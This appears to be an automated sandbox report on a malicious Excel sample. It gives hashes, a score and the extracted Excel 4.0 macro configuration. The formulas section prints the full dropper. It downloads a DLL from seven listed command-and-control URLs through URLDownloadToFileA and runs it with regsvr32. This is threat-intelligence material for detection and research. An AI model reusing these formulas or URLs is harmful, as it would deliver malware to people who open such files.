General

  • Target

    277f9d984cbeb829ec414e1bad059590ae6bab271ff8cd54d9555b5a9f7ecb71

  • Size

    32KB

  • Sample

    241111-ws828aslaz

  • MD5

    be7e9db9dc0f7337e035c430fd7ad6de

  • SHA1

    d70409c93906bee168d2d4ec9e2b4564b9591907

  • SHA256

    277f9d984cbeb829ec414e1bad059590ae6bab271ff8cd54d9555b5a9f7ecb71

  • SHA512

    b474e2e30448d4668b8e55f2147dca79a7869f8c99d17de62d9235b5a399877962668bc875054d50817fc52ec6553ffb638d7e2d556af9c13aca3b3795604d9d

  • SSDEEP

    384:sjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:sjpFhNNlizXT28dFfPdkqstJmE6/

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://casache.com/web/n3jxwXXwa/

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/

http://ccalaire.com/wp-admin/d1pGRa0X/

http://cdimprintpr.com/brochure2/A9NmYDndZ/

http://careerplan.host20.uk/images/Ls/

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casache.com/web/n3jxwXXwa/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ccalaire.com/wp-admin/d1pGRa0X/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cdimprintpr.com/brochure2/A9NmYDndZ/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://careerplan.host20.uk/images/Ls/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://casache.com/web/n3jxwXXwa/

xlm40.dropper

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/

xlm40.dropper

http://ccalaire.com/wp-admin/d1pGRa0X/

xlm40.dropper

http://cdimprintpr.com/brochure2/A9NmYDndZ/

xlm40.dropper

http://careerplan.host20.uk/images/Ls/

xlm40.dropper

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

Targets

    • Target

      277f9d984cbeb829ec414e1bad059590ae6bab271ff8cd54d9555b5a9f7ecb71

    • Size

      32KB

    • MD5

      be7e9db9dc0f7337e035c430fd7ad6de

    • SHA1

      d70409c93906bee168d2d4ec9e2b4564b9591907

    • SHA256

      277f9d984cbeb829ec414e1bad059590ae6bab271ff8cd54d9555b5a9f7ecb71

    • SHA512

      b474e2e30448d4668b8e55f2147dca79a7869f8c99d17de62d9235b5a399877962668bc875054d50817fc52ec6553ffb638d7e2d556af9c13aca3b3795604d9d

    • SSDEEP

      384:sjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:sjpFhNNlizXT28dFfPdkqstJmE6/

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks